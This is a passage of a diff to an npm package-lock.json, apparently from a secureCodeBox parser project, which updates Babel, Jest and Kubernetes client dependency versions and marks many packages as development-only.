"sha512-kSMlyUVdWe25rEsRGviIgOWnoT/nfABVWlqt9N19/dIPWViAOW2s9wznP5tURbs/IDuNk4gPy3YdYRgH3uxhBw==", + "dev": true }, "@babel/helper-string-parser": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.25.9.tgz", - "integrity": "sha512-4A/SCr/2KLd5jrtOMFzaKjVtAei3+2r/NChoBNoZ3EyP/+GlhoaEGoWOZUmFmoITP7zOJyHIMm+DYRd8o3PvHA==" + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-string-parser/-/helper-string-parser-7.27.1.tgz", + "integrity": "sha512-qMlSxKbpRlAridDExk92nSobyDdpPijUq2DW6oDnUqd0iOGxmQjyqhMIihI9+zv4LPyZdRje2cavWPbCbWm3eA==", + "dev": true }, "@babel/helper-validator-identifier": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", - "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==" + "version": "7.27.1", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.27.1.tgz", + "integrity": "sha512-D2hP9eA+Sqx1kBZgzxZh0y1trbuU+JoDkiEwqhQ36nodYqJwyEIhPSdMNd7lOm/4io72luTPWH20Yda0xOuUow==", + "dev": true }, "@babel/helper-validator-option": { "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/helper-validator-option/-/helper-validator-option-7.25.9.tgz", - "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==" + "integrity": "sha512-e/zv1co8pp55dNdEcCynfj9X7nyUKUXoUEwfXqaZt0omVOmDe9oOTdKStH4GmAw6zxMFs50ZayuMfHDKlO7Tfw==", + "dev": true }, "@babel/helpers": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.26.0.tgz", - "integrity": "sha512-tbhNuIxNcVb21pInl3ZSjksLCvgdZy9KwJ8brv993QtIVKJBBkYXz4q4ZbAv31GdnC+R90np23L5FbEBlthAEw==", + "version": "7.27.6", + "resolved": "https://registry.npmjs.org/@babel/helpers/-/helpers-7.27.6.tgz", + "integrity": "sha512-muE8Tt8M22638HU31A3CgfSUciwz1fhATfoVai05aPXGor//CdWDCbnlY1yvBPo07njuVOCNGCSp/GTt12lIug==", + "dev": true, "requires": { - "@babel/template": "^7.25.9", - "@babel/types": "^7.26.0" + "@babel/template": "^7.27.2", + "@babel/types": "^7.27.6" } }, "@babel/parser": { - "version": "7.26.2", - "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.26.2.tgz", - "integrity": "sha512-DWMCZH9WA4Maitz2q21SRKHo9QXZxkDsbNZoVD62gusNtNBBqDg9i7uOhASfTfIGNzW+O+r7+jAlM8dwphcJKQ==", + "version": "7.27.5", + "resolved": "https://registry.npmjs.org/@babel/parser/-/parser-7.27.5.tgz", + "integrity": "sha512-OsQd175SxWkGlzbny8J3K8TnnDD0N3lrIUtB92xwyRpzaenGZhxDvxN/JgU00U3CDZNj9tPuDJ5H0WS4Nt3vKg==", + "dev": true, "requires": { - "@babel/types": "^7.26.0" + "@babel/types": "^7.27.3" } }, "@babel/plugin-syntax-async-generators": { "version": "7.8.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-async-generators/-/plugin-syntax-async-generators-7.8.4.tgz", "integrity": "sha512-tycmZxkGfZaxhMRbXlPXuVFpdWlXpir2W4AMhSJgRKzk/eDlIXOhb2LHWoLpDF7TEHylV5zNhykX6KAgHJmTNw==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.8.0" } @@ -4227,6 +4455,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-bigint/-/plugin-syntax-bigint-7.8.3.tgz", "integrity": "sha512-wnTnFlG+YxQm3vDxpGE57Pj0srRU4sHE/mDkt1qv2YJJSeUAec2ma4WLUnUPeKjyrfntVwe/N6dCXpU+zL3Npg==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.8.0" } @@ -4235,6 +4464,7 @@ "version": "7.12.13", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-class-properties/-/plugin-syntax-class-properties-7.12.13.tgz", "integrity": "sha512-fm4idjKla0YahUNgFNLCB0qySdsoPiZP3iQE3rky0mBUtMZ23yDJ9SJdg6dXTSDnulOVqiF3Hgr9nbXvXTQZYA==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.12.13" } @@ -4243,6 +4473,7 @@ "version": "7.10.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-import-meta/-/plugin-syntax-import-meta-7.10.4.tgz", "integrity": "sha512-Yqfm+XDx0+Prh3VSeEQCPU81yC+JWZ2pDPFSS4ZdpfZhp4MkFMaDC1UqseovEKwSUpnIL7+vK+Clp7bfh0iD7g==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.10.4" } @@ -4251,6 +4482,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-json-strings/-/plugin-syntax-json-strings-7.8.3.tgz", "integrity": "sha512-lY6kdGpWHvjoe2vk4WrAapEuBR69EMxZl+RoGRhrFGNYVK8mOPAW8VfbT/ZgrFbXlDNiiaxQnAtgVCZ6jv30EA==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.8.0" } @@ -4259,6 +4491,7 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-jsx/-/plugin-syntax-jsx-7.25.9.tgz", "integrity": "sha512-ld6oezHQMZsZfp6pWtbjaNDF2tiiCYYDqQszHt5VV437lewP9aSi2Of99CK0D0XB21k7FLgnLcmQKyKzynfeAA==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.25.9" } @@ -4267,6 +4500,7 @@ "version": "7.10.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-logical-assignment-operators/-/plugin-syntax-logical-assignment-operators-7.10.4.tgz", "integrity": "sha512-d8waShlpFDinQ5MtvGU9xDAOzKH47+FFoney2baFIoMr952hKOLp1HR7VszoZvOsV/4+RRszNY7D17ba0te0ig==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.10.4" } @@ -4275,6 +4509,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-nullish-coalescing-operator/-/plugin-syntax-nullish-coalescing-operator-7.8.3.tgz", "integrity": "sha512-aSff4zPII1u2QD7y+F8oDsz19ew4IGEJg9SVW+bqwpwtfFleiQDMdzA/R+UlWDzfnHFCxxleFT0PMIrR36XLNQ==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.8.0" } @@ -4283,6 +4518,7 @@ "version": "7.10.4", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-numeric-separator/-/plugin-syntax-numeric-separator-7.10.4.tgz", "integrity": "sha512-9H6YdfkcK/uOnY/K7/aA2xpzaAgkQn37yzWUMRK7OaPOqOpGS1+n0H5hxT9AUw9EsSjPW8SVyMJwYRtWs3X3ug==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.10.4" } @@ -4291,6 +4527,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-object-rest-spread/-/plugin-syntax-object-rest-spread-7.8.3.tgz", "integrity": "sha512-XoqMijGZb9y3y2XskN+P1wUGiVwWZ5JmoDRwx5+3GmEplNyVM2s2Dg8ILFQm8rWM48orGy5YpI5Bl8U1y7ydlA==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.8.0" } @@ -4299,6 +4536,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-catch-binding/-/plugin-syntax-optional-catch-binding-7.8.3.tgz", "integrity": "sha512-6VPD0Pc1lpTqw0aKoeRTMiB+kWhAoT24PA+ksWSBrFtl5SIRVpZlwN3NNPQjehA2E/91FV3RjLWoVTglWcSV3Q==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.8.0" } @@ -4307,6 +4545,7 @@ "version": "7.8.3", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-optional-chaining/-/plugin-syntax-optional-chaining-7.8.3.tgz", "integrity": "sha512-KoK9ErH1MBlCPxV0VANkXW2/dw4vlbGDrFgz8bmUsBGYkFRcbRwMh6cIJubdPrkxRwuGdtCk0v/wPTKbQgBjkg==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.8.0" } @@ -4315,6 +4554,7 @@ "version": "7.14.5", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-top-level-await/-/plugin-syntax-top-level-await-7.14.5.tgz", "integrity": "sha512-hx++upLv5U1rgYfwe1xBQUhRmU41NEvpUvrp8jkrSCdvGSnM5/qdRMtylJ6PG5OFkBaHkbTAKTnd3/YyESRHFw==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.14.5" } @@ -4323,24 +4563,27 @@ "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/plugin-syntax-typescript/-/plugin-syntax-typescript-7.25.9.tgz", "integrity": "sha512-hjMgRy5hb8uJJjUcdWunWVcoi9bGpJp8p5Ol1229PoN6aytsLwNMgmdftO23wnCLMfVmTwZDWMPNq/D1SY60JQ==", + "dev": true, "requires": { "@babel/helper-plugin-utils": "^7.25.9" } }, "@babel/template": { - "version": "7.25.9", - "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.25.9.tgz", - "integrity": "sha512-9DGttpmPvIxBb/2uwpVo3dqJ+O6RooAFOS+lB+xDqoE2PVCE8nfoHMdZLpfCQRLwvohzXISPZcgxt80xLfsuwg==", + "version": "7.27.2", + "resolved": "https://registry.npmjs.org/@babel/template/-/template-7.27.2.tgz", + "integrity": "sha512-LPDZ85aEJyYSd18/DkjNh4/y1ntkE5KwUHWTiqgRxruuZL2F1yuHligVHLvcHY2vMHXttKFpJn6LwfI7cw7ODw==", + "dev": true, "requires": { - "@babel/code-frame": "^7.25.9", - "@babel/parser": "^7.25.9", - "@babel/types": "^7.25.9" + "@babel/code-frame": "^7.27.1", + "@babel/parser": "^7.27.2", + "@babel/types": "^7.27.1" } }, "@babel/traverse": { "version": "7.25.9", "resolved": "https://registry.npmjs.org/@babel/traverse/-/traverse-7.25.9.tgz", "integrity": "sha512-ZCuvfwOwlz/bawvAuvcj8rrithP2/N55Tzz342AkTvq4qaWbGfmCk/tKhNaV2cthijKrPAA8SRJV5WWe7IBMJw==", + "dev": true, "requires": { "@babel/code-frame": "^7.25.9", "@babel/generator": "^7.25.9", @@ -4352,23 +4595,26 @@ } }, "@babel/types": { - "version": "7.26.0", - "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.26.0.tgz", - "integrity": "sha512-Z/yiTPj+lDVnF7lWeKCIJzaIkI0vYO87dMpZ4bg4TDrFe4XXLFWL1TbXU27gBP3QccxV9mZICCrnjnYlJjXHOA==", + "version": "7.27.6", + "resolved": "https://registry.npmjs.org/@babel/types/-/types-7.27.6.tgz", + "integrity": "sha512-ETyHEk2VHHvl9b9jZP5IHPavHYk57EhanlRRuae9XCpb/j5bDCbPPMOBfCWhnl/7EDJz0jEMCi/RhccCE8r1+Q==", + "dev": true, "requires": { - "@babel/helper-string-parser": "^7.25.9", - "@babel/helper-validator-identifier": "^7.25.9" + "@babel/helper-string-parser": "^7.27.1", + "@babel/helper-validator-identifier": "^7.27.1" } }, "@bcoe/v8-coverage": { "version": "0.2.3", "resolved": "https://registry.npmjs.org/@bcoe/v8-coverage/-/v8-coverage-0.2.3.tgz", - "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==" + "integrity": "sha512-0hYQ8SB4Db5zvZB4axdMHGwEaQjkZzFjQiN9LVYvIFB2nSUHW9tYpxWriPrWDASIxiaXax83REcLxuSdnGPZtw==", + "dev": true }, "@istanbuljs/load-nyc-config": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/@istanbuljs/load-nyc-config/-/load-nyc-config-1.1.0.tgz", "integrity": "sha512-VjeHSlIzpv/NyD3N0YuHfXOPDIixcA1q2ZV98wsMqcYlPmv2n3Yb2lYP9XMElnaFVXg5A7YLTeLu6V84uQDjmQ==", + "dev": true, "requires": { "camelcase": "^5.3.1", "find-up": "^4.1.0", @@ -4381,6 +4627,7 @@ "version": "1.0.10", "resolved": "https://registry.npmjs.org/argparse/-/argparse-1.0.10.tgz", "integrity": "sha512-o5Roy6tNG4SL/FOkCAN6RzjiakZS25RLYFrcMttJqbdd8BWrnA+fGz57iN5Pb06pvBGvl5gQ0B48dJlslXvoTg==", + "dev": true, "requires": { "sprintf-js": "~1.0.2" } @@ -4389,6 +4636,7 @@ "version": "3.14.1", "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", + "dev": true, "requires": { "argparse": "^1.0.7", "esprima": "^4.0.0" @@ -4399,12 +4647,14 @@ "@istanbuljs/schema": { "version": "0.1.3", "resolved": "https://registry.npmjs.org/@istanbuljs/schema/-/schema-0.1.3.tgz", - "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==" + "integrity": "sha512-ZXRY4jNvVgSVQ8DL3LTcakaAtXwTVUxE81hslsyD2AtoXW/wVob10HkOJ1X/pAlcI7D+2YoZKg5do8G/w6RYgA==", + "dev": true }, "@jest/console": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/console/-/console-29.7.0.tgz", "integrity": "sha512-5Ni4CU7XHQi32IJ398EEP4RrB8eV09sXP2ROqD4bksHrnTree52PsxvX8tpL8LvTZ3pFzXyPbNQReSN41CAhOg==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "@types/node": "*", @@ -4418,6 +4668,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/core/-/core-29.7.0.tgz", "integrity": "sha512-n7aeXWKMnGtDA48y8TLWJPJmLmmZ642Ceo78cYWEpiD7FzDgmNDV/GCVRorPABdXLJZ/9wzzgZAlHjXjxDHGsg==", + "dev": true, "requires": { "@jest/console": "^29.7.0", "@jest/reporters": "^29.7.0", @@ -4453,6 +4704,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/environment/-/environment-29.7.0.tgz", "integrity": "sha512-aQIfHDq33ExsN4jP1NWGXhxgQ/wixs60gDiKO+XVMd8Mn0NWPWgc34ZQDTb2jKaUWQ7MuwoitXAsN2XVXNMpAw==", + "dev": true, "requires": { "@jest/fake-timers": "^29.7.0", "@jest/types": "^29.6.3", @@ -4464,6 +4716,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/expect/-/expect-29.7.0.tgz", "integrity": "sha512-8uMeAMycttpva3P1lBHB8VciS9V0XAr3GymPpipdyQXbBcuhkLQOSe8E/p92RyAdToS6ZD1tFkX+CkhoECE0dQ==", + "dev": true, "requires": { "expect": "^29.7.0", "jest-snapshot": "^29.7.0" @@ -4473,6 +4726,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/expect-utils/-/expect-utils-29.7.0.tgz", "integrity": "sha512-GlsNBWiFQFCVi9QVSx7f5AgMeLxe9YCCs5PuP2O2LdjDAA8Jh9eX7lA1Jq/xdXw3Wb3hyvlFNfZIfcRetSzYcA==", + "dev": true, "requires": { "jest-get-type": "^29.6.3" } @@ -4481,6 +4735,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/fake-timers/-/fake-timers-29.7.0.tgz", "integrity": "sha512-q4DH1Ha4TTFPdxLsqDXK1d3+ioSL7yL5oCMJZgDYm6i+6CygW5E5xVr/D1HdsGxjt1ZWSfUAs9OxSB/BNelWrQ==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "@sinonjs/fake-timers": "^10.0.2", @@ -4494,6 +4749,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/globals/-/globals-29.7.0.tgz", "integrity": "sha512-mpiz3dutLbkW2MNFubUGUEVLkTGiqW6yLVTA+JbP6fI6J5iL9Y0Nlg8k95pcF8ctKwCS7WVxteBs29hhfAotzQ==", + "dev": true, "requires": { "@jest/environment": "^29.7.0", "@jest/expect": "^29.7.0", @@ -4505,6 +4761,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/reporters/-/reporters-29.7.0.tgz", "integrity": "sha512-DApq0KJbJOEzAFYjHADNNxAE3KbhxQB1y5Kplb5Waqw6zVbuWatSnMjE5gs8FUgEPmNsnZA3NCWl9NG0ia04Pg==", + "dev": true, "requires": { "@bcoe/v8-coverage": "^0.2.3", "@jest/console": "^29.7.0", @@ -4536,6 +4793,7 @@ "version": "6.0.3", "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-6.0.3.tgz", "integrity": "sha512-Vtgk7L/R2JHyyGW07spoFlB8/lpjiOLTjMdms6AFMraYt3BaJauod/NGrfnVG/y4Ix1JEuMRPDPEj2ua+zz1/Q==", + "dev": true, "requires": { "@babel/core": "^7.23.9", "@babel/parser": "^7.23.9", @@ -4547,7 +4805,8 @@ "semver": { "version": "7.6.3", "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", - "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==" + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "dev": true } } }, @@ -4555,6 +4814,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/@jest/schemas/-/schemas-29.6.3.tgz", "integrity": "sha512-mo5j5X+jIZmJQveBKeS/clAueipV7KgiX1vMgCxam1RNYiqE1w62n0/tJJnHtjW8ZHcQco5gY85jA3mi0L+nSA==", + "dev": true, "requires": { "@sinclair/typebox": "^0.27.8" } @@ -4563,6 +4823,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/@jest/source-map/-/source-map-29.6.3.tgz", "integrity": "sha512-MHjT95QuipcPrpLM+8JMSzFx6eHp5Bm+4XeFDJlwsvVBjmKNiIAvasGK2fxz2WbGRlnvqehFbh07MMa7n3YJnw==", + "dev": true, "requires": { "@jridgewell/trace-mapping": "^0.3.18", "callsites": "^3.0.0", @@ -4573,6 +4834,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/test-result/-/test-result-29.7.0.tgz", "integrity": "sha512-Fdx+tv6x1zlkJPcWXmMDAG2HBnaR9XPSd5aDWQVsfrZmLVT3lU1cwyxLgRmXR9yrq4NBoEm9BMsfgFzTQAbJYA==", + "dev": true, "requires": { "@jest/console": "^29.7.0", "@jest/types": "^29.6.3", @@ -4584,6 +4846,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/test-sequencer/-/test-sequencer-29.7.0.tgz", "integrity": "sha512-GQwJ5WZVrKnOJuiYiAF52UNUJXgTZx1NHjFSEB0qEMmSZKAkdMoIzw/Cj6x6NF4AvV23AUqDpFzQkN/eYCYTxw==", + "dev": true, "requires": { "@jest/test-result": "^29.7.0", "graceful-fs": "^4.2.9", @@ -4595,6 +4858,7 @@ "version": "29.7.0", "resolved": "https://registry.npmjs.org/@jest/transform/-/transform-29.7.0.tgz", "integrity": "sha512-ok/BTPFzFKVMwO5eOHRrvnBVHdRy9IrsrW1GpMaQ9MCnilNLXQKmAX8s1YXDFaai9xJpac2ySzV0YeRRECr2Vw==", + "dev": true, "requires": { "@babel/core": "^7.11.6", "@jest/types": "^29.6.3", @@ -4617,6 +4881,7 @@ "version": "29.6.3", "resolved": "https://registry.npmjs.org/@jest/types/-/types-29.6.3.tgz", "integrity": "sha512-u3UPsIilWKOM3F9CXtrG8LEJmNxwoCQC/XVj4IKYXvvpx7QIi/Kg1LI5uDmDpKlac62NUtX7eLjRh+jVZcLOzw==", + "dev": true, "requires": { "@jest/schemas": "^29.6.3", "@types/istanbul-lib-coverage": "^2.0.0", @@ -4630,6 +4895,7 @@ "version": "0.3.5", "resolved": "https://registry.npmjs.org/@jridgewell/gen-mapping/-/gen-mapping-0.3.5.tgz", "integrity": "sha512-IzL8ZoEDIBRWEzlCcRhOaCupYyN5gdIK+Q6fbFdPDg6HqX6jpkItn7DFIpW9LQzXG6Df9sA7+OKnq0qlz/GaQg==", + "dev": true, "requires": { "@jridgewell/set-array": "^1.2.1", "@jridgewell/sourcemap-codec": "^1.4.10", @@ -4639,71 +4905,90 @@ "@jridgewell/resolve-uri": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/@jridgewell/resolve-uri/-/resolve-uri-3.1.0.tgz", - "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==" + "integrity": "sha512-F2msla3tad+Mfht5cJq7LSXcdudKTWCVYUgw6pLFOOHSTtZlj6SWNYAp+AhuqLmWdBO2X5hPrLcu8cVP8fy28w==", + "dev": true }, "@jridgewell/set-array": { "version": "1.2.1", "resolved": "https://registry.npmjs.org/@jridgewell/set-array/-/set-array-1.2.1.tgz", - "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==" + "integrity": "sha512-R8gLRTZeyp03ymzP/6Lil/28tGeGEzhx1q2k703KGWRAI1VdvPIXdG70VJc2pAMw3NA6JKL5hhFu1sJX0Mnn/A==", + "dev": true }, "@jridgewell/sourcemap-codec": { "version": "1.4.15", "resolved": "https://registry.npmjs.org/@jridgewell/sourcemap-codec/-/sourcemap-codec-1.4.15.tgz", - "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==" + "integrity": "sha512-eF2rxCRulEKXHTRiDrDy6erMYWqNw4LPdQ8UQA4huuxaQsVeRPFl2oM8oDGxMFhJUWZf9McpLtJasDDZb/Bpeg==", + "dev": true }, "@jridgewell/trace-mapping": { "version": "0.3.25", "resolved": "https://registry.npmjs.org/@jridgewell/trace-mapping/-/trace-mapping-0.3.25.tgz", "integrity": "sha512-vNk6aEwybGtawWmy/PzwnGDOjCkLWSD2wqvjGGAgOAwCGWySYXfYoxt00IJkTF+8Lb57DwOb3Aa0o9CApepiYQ==", + "dev": true, "requires": { "@jridgewell/resolve-uri": "^3.1.0", "@jridgewell/sourcemap-codec": "^1.4.14" } }, + "@jsep-plugin/assignment": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@jsep-plugin/assignment/-/assignment-1.3.0.tgz", + "integrity": "sha512-VVgV+CXrhbMI3aSusQyclHkenWSAm95WaiKrMxRFam3JSUiIaQjoMIw2sEs/OX4XifnqeQUN4DYbJjlA8EfktQ==", + "dev": true, + "requires": {} + }, + "@jsep-plugin/regex": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/@jsep-plugin/regex/-/regex-1.0.4.tgz", + "integrity": "sha512-q7qL4Mgjs1vByCaTnDFcBnV9HS7GVPJX5vyVoCgZHNSC9rjwIlmbXG5sUuorR5ndfHAIlJ8pVStxvjXHbNvtUg==", + "dev": true, + "requires": {} + }, "@kubernetes/client-node": { - "version": "0.19.0", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.19.0.tgz", - "integrity": "sha512-WTOjGuFQ8yeW3+qD6JrAYhpwpoQbe9R8cA/61WCyFrNawSTUgLstHu7EsZRYEs39er3jDn3wCEaczz+VOFlc2Q==", + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-1.3.0.tgz", + "integrity": "sha512-IE0yrIpOT97YS5fg2QpzmPzm8Wmcdf4ueWMn+FiJSI3jgTTQT1u+LUhoYpdfhdHAVxdrNsaBg2C0UXSnOgMoCQ==", "dev": true, "requires": { "@types/js-yaml": "^4.0.1", - "@types/node": "^20.1.1", - "@types/request": "^2.47.1", - "@types/ws": "^8.5.3", - "byline": "^5.0.0", + "@types/node": "^22.0.0", + "@types/node-fetch": "^2.6.9", + "@types/stream-buffers": "^3.0.3", + "form-data": "^4.0.0", + "hpagent": "^1.2.0", "isomorphic-ws": "^5.0.0", "js-yaml": "^4.1.0", - "jsonpath-plus": "^7.2.0", - "openid-client": "^5.3.0", - "request": "^2.88.0", + "jsonpath-plus": "^10.3.0", + "node-fetch": "^2.6.9", + "openid-client": "^6.1.3", "rfc4648": "^1.3.0", + "socks-proxy-agent": "^8.0.4", "stream-buffers": "^3.0.2", - "tar": "^6.1.11", - "tslib": "^2.4.1", - "ws": "^8.11.0" + "tar-fs": "^3.0.8", + "ws": "^8.18.2" } }, "@securecodebox/parser-sdk-nodejs": { "version": "file:../../parser-sdk/nodejs", "requires": { - "@kubernetes/client-node": "^0.22.3", + "@kubernetes/client-node": "^1.3.0", "ajv": "^8.17.1", "ajv-draft-04": "^1.0.0", "ajv-formats": "^3.0.1", - "axios": "^1.7.8", - "jsonpointer": "^5.0.1", - "ws": "^8.13.0" + "jsonpointer": "^5.0.1" } }, "@sinclair/typebox": { "version": "0.27.8", "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==" + "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", + "dev": true }, "@sinonjs/commons": { "version": "3.0.1", "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", + "dev": true, "requires": { "type-detect": "4.0.8" } @@ -4712,6 +4997,7 @@ "version": "10.3.0", "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", + "dev": true, "requires": { "@sinonjs/commons": "^3.0.0" } @@ -4720,6 +5006,7 @@ "version": "7.20.5", "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", + "dev": true, "requires": { "@babel/parser": "^7.20.7", "@babel/types": "^7.20.7", @@ -4732,6 +5019,7 @@ "version": "7.6.8", "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", + "dev": true, "requires": { "@babel/types": "^7.0.0" } @@ -4740,6 +5028,7 @@ "version": "7.4.4", "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", + "dev": true, "requires": { "@babel/parser": "^7.1.0", "@babel/types": "^7.0.0" @@ -4749,20 +5038,16 @@ "version": "7.20.6", "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", + "dev": true, "requires": { "@babel/types": "^7.20.7" } }, - "@types/caseless": { - "version": "0.12.2", - "resolved": "https://registry.npmjs.org/@types/caseless/-/caseless-0.12.2.tgz", - "integrity": "sha512-6ckxMjBBD8URvjB6J3NcnuAn5Pkl7t3TizAg+xdlzzQGSPSmBcXf8KoIH0ua/i+tio+ZRUHEXp0HEmvaR4kt0w==", - "dev": true - }, "@types/graceful-fs": { "version": "4.1.9", "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", + "dev": true, "requires": { "@types/node": "*" } @@ -4770,12 +5055,14 @@ "@types/istanbul-lib-coverage": { "version": "2.0.4", "resolved": 